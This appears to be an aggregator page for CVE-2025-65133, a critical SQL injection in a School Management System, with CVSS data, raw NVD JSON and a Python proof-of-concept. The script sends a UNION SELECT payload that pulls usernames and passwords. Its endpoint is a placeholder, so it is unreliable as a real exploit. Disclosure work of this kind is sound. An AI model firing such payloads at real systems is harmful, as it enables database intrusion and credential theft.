Security Vulnerability Report
中文
CVE-2025-65133 CVSS 9.8 CRITICAL

CVE-2025-65133

Published: 2026-04-14 16:16:34
Last Modified: 2026-04-17 15:33:34

Description

A SQL injection vulnerability exists in the School Management System (version 1.0) by manikandan580. An unauthenticated or authenticated remote attacker can supply a crafted HTTP request to the affected endpoint to manipulate SQL query logic and extract sensitive database information.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

School Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_sqli(target_url): """ Proof of Concept for CVE-2025-65133 Demonstrates SQL Injection in School Management System 1.0 """ # Vulnerable parameter (example, adjust based on actual endpoint) payload = "1' UNION SELECT NULL, username, password FROM users-- " # Example endpoint (replace with actual vulnerable endpoint) full_url = f"{target_url}/vulnerable_endpoint.php?id={payload}" try: response = requests.get(full_url, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check response content for potential data extraction.") print(f"[+] Response Length: {len(response.text)}") else: print(f"[-] Unexpected status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://target-ip" # Replace with actual target exploit_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65133", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:34.180", "lastModified": "2026-04-17T15:33:34.050", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL injection vulnerability exists in the School Management System (version 1.0) by manikandan580. An unauthenticated or authenticated remote attacker can supply a crafted HTTP request to the affected endpoint to manipulate SQL query logic and extract sensitive database information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65133/README.md", "source": "[email protected]"}, {"url": "https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65133/poc.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}